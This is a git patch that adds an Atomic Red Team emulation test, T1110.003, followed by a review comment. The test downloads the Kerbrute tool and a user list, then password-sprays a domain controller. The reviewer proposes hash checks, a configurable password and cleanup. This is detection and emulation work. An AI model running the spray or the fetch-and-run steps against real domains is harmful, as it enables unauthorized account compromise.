From 44bb4bbadaef41bbcaf66d7ffefd2243a8738c97 Mon Sep 17 00:00:00 2001
From: TomFord3 <92330953+TomFord3@users.noreply.github.com>
Date: Thu, 1 Sep 2022 12:15:40 -0500
Subject: [PATCH] T1110.003 Kerbrute Password Spray (#2111)
* T1110.003 Kerbrute Password Spray
* Update T1110.003.yaml
Co-authored-by: Tom Hagan
---
 atomics/T1110.003/T1110.003.yaml | 35 +++++++++++++++++++++++++
 atomics/T1110.003/src/passwordspray.txt | 7 +++++
 2 files changed, 42 insertions(+)
 create mode 100644 atomics/T1110.003/src/passwordspray.txt
diff --git a/atomics/T1110.003/T1110.003.yaml b/atomics/T1110.003/T1110.003.yaml
index 812f2ce3..f4cbfb54 100644
--- a/atomics/T1110.003/T1110.003.yaml
+++ b/atomics/T1110.003/T1110.003.yaml
@@ -253,3 +253,38 @@ atomic_tests:
 command: |
 import-module "$env:temp\MSOLSpray.ps1"
 Invoke-MSOLSpray -UserList "#{user_list}" -Password "#{password}"
+- name: Password Spray using Kerbrute Tool
+ description: |
+ Test a single password against a list of users
+ supported_platforms:
+ - windows
+ input_arguments:
+ domaincontroller:
+ description: Domain controller where test will be run
+ type: String
+ default: $ENV:userdnsdomain
+ domain:
+ description: Domain where you will be testing
+ type: String
+ default: $ENV:userdomain
+ dependency_executor_name: powershell
+ dependencies:
+ - description: |
+ kerbrute.exe must exist in $env:temp
+ prereq_command: |
+ if (test-path $env:temp\kerbrute.exe){exit 0} else {exit 1}
+ get_prereq_command: |
+ invoke-webrequest "https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_windows_386.exe" -outfile "$env:temp\kerbrute.exe"
+ - description: |
+ passwordspray.txt must exist in $env:temp
+ prereq_command: |
+ if (test-path $env:temp\passwordspray.txt){exit 0} else {exit 1}
+ get_prereq_command: |
+ invoke-webrequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/src/passwordspray.txt?raw=true" -outfile "$env:temp\passwordspray.txt"
+ executor:
+ name: powershell
+ elevation_required: false
+ command: |
+ cd $env:temp
+ .\kerbrute.exe passwordspray --dc #{domaincontroller} -d #{domain} $env:temp\passwordspray.txt password132
+
diff --git a/atomics/T1110.003/src/passwordspray.txt b/atomics/T1110.003/src/passwordspray.txt
new file mode 100644
index 00000000..3d0cd211
--- /dev/null
+++ b/atomics/T1110.003/src/passwordspray.txt
@@ -0,0 +1,7 @@
+test1
+test2
+test3
+test4
+test5
+passs_word
+drowssap
\ No newline at end of file
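Review bot: The kerbrute `get_prereq_command` in the T1110.003.yaml hunk downloads `kerbrute_windows_386.exe` and the executor then runs it, but nothing checks the file against a known digest; the release tag is pinned (v1.0.3), yet a replaced release asset or a tampered download would still be executed on the test host. Comparing `Get-FileHash` output with a SHA-256 recorded in the YAML closes that, and the user list deserves the same pinning, since it is fetched from `blob/master`, which can change under the test. The sprayed password `password132` is hard-coded in `command`, whereas the MSOLSpray test in the context lines just above takes `#{password}`; an input argument keeps the two consistent and lets operators choose a value that cannot match a real account. There is also no `cleanup_command`, so the binary and the list stay in `$env:temp` after the run. The new test entry is complete within the hunk; the `atomic_tests` list it is appended to starts outside it.

```yaml
  input_arguments:
    # … unchanged: domaincontroller, domain …
    password:
      description: Single password tried against every user in the list
      type: String
      default: password132
  # … unchanged: dependency_executor_name, kerbrute prereq_command …
    get_prereq_command: |
      invoke-webrequest "https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_windows_386.exe" -outfile "$env:temp\kerbrute.exe"
      # placeholder digest: record the SHA-256 of the reviewed v1.0.3 asset here
      if ((Get-FileHash "$env:temp\kerbrute.exe" -Algorithm SHA256).Hash -ne "<EXPECTED_SHA256_PLACEHOLDER>") {
        Remove-Item "$env:temp\kerbrute.exe" -ErrorAction Ignore
        exit 1
      }
  # … unchanged: passwordspray.txt dependency, executor name and elevation_required …
    command: |
      cd $env:temp
      .\kerbrute.exe passwordspray --dc #{domaincontroller} -d #{domain} $env:temp\passwordspray.txt #{password}
    cleanup_command: |
      Remove-Item "$env:temp\kerbrute.exe","$env:temp\passwordspray.txt" -ErrorAction Ignore
```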